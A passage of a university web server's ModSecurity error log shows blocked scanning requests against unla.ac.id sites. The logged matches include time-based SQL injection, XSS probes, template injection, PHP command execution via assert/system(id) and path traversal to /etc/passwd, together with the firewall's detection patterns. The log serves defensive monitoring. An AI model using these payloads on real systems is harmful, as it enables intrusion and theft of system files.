"ZO1ihcCo-f0AAPw0chcAAAAE"]
[Tue Aug 29 10:14:15.589721 2023] [:error] [pid 64564] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ih8Co-f0AAPw0chgAAAAE"]
[Tue Aug 29 10:18:23.449027 2023] [:error] [pid 64673] [client 36.69.12.4] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.255.4.121_d67e5c77ccb4028457e4bbb31078a8f9aaae79dc"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZO1jf8Co-f0AAPyhVA4AAAAT"]
[Tue Aug 29 10:36:50.715085 2023] [:error] [pid 64915] [client 89.208.136.177] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-22.php"] [unique_id "ZO1n0sCo-f0AAP2T@KUAAAAC"]
[Tue Aug 29 11:05:31.273489 2023] [:error] [pid 65446] [client 36.79.161.167] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.6.68_4eca0dfdfab95bb7a540e2850c4a5f213a388d7c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/website/upload_files.js"] [unique_id "ZO1ui8Co-f0AAP@m2toAAAAL"]
[Tue Aug 29 11:05:31.273594 2023] [:error] [pid 65426] [client 36.79.161.167] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.6.68_4eca0dfdfab95bb7a540e2850c4a5f213a388d7c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/website/file_list.js"] [unique_id "ZO1ui8Co-f0AAP@SlMIAAAAN"]
[Tue Aug 29 11:18:44.512884 2023] [:error] [pid 668] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1xpMCo-f0AAAKcIxsAAAAA"]
[Tue Aug 29 11:18:44.672542 2023] [:error] [pid 679] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1xpMCo-f0AAAKnPlMAAAAN"]
[Tue Aug 29 11:21:06.600063 2023] [:error] [pid 721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1yMsCo-f0AAALRG9AAAAAQ"]
[Tue Aug 29 11:21:12.543970 2023] [:error] [pid 728] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAALY@XMAAAAU"]
[Tue Aug 29 11:21:12.659916 2023] [:error] [pid 678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAAKmJuEAAAAH"]
[Tue Aug 29 11:21:12.886390 2023] [:error] [pid 611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAAJjrWkAAAAK"]
[Tue Aug 29 11:21:19.053701 2023] [:error] [pid 663] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAKXUioAAAAG"]
[Tue Aug 29 11:21:19.247175 2023] [:error] [pid 663] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAKXUisAAAAG"]
[Tue Aug 29 11:21:19.531646 2023] [:error] [pid 611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAJjrWsAAAAK"]
[Tue Aug 29 11:21:19.831937 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAALZnUkAAAAV"]
[Tue Aug 29 11:21:20.586543 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1yQMCo-f0AAALZnUoAAAAV"]
[Tue Aug 29 11:21:22.008984 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1yQsCo-f0AAALZnUsAAAAV"]
[Tue Aug 29 11:30:10.943191 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAOYZhQAAAAB"]
[Tue Aug 29 11:30:11.089153 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAO-1ncAAAAI"]
[Tue Aug 29 11:30:11.114173 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAPAexYAAAAL"]
[Tue Aug 29 11:30:11.240430 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAANjpv4AAAAT"]
[Tue Aug 29 11:30:11.283372 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOM4TYAAAAU"]
[Tue Aug 29 11:30:11.396857 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAOKNk8AAAAK"]
[Tue Aug 29 11:30:11.419838 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOKNlAAAAAK"]
[Tue Aug 29 11:30:11.689284 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAN5YEoAAAAN"]
[Tue Aug 29 11:30:11.737610 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPGfqwAAAAV"]
[Tue Aug 29 11:30:12.607992 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10VMCo-f0AAAPLwAoAAAAX"]
[Tue Aug 29 11:30:12.652072 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5u4AAAAh"]
[Tue Aug 29 11:30:12.703416 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAN5YFIAAAAN"]
[Tue Aug 29 11:30:12.721287 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPNBPUAAAAZ"]
[Tue Aug 29 11:30:12.736487 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPQkdoAAAAe"]
[Tue Aug 29 11:30:12.743730 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5vEAAAAh"]
[Tue Aug 29 11:30:13.349090 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPRNW0AAAAf"]
[Tue Aug 29 11:30:13.352611 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAOM4T0AAAAU"]
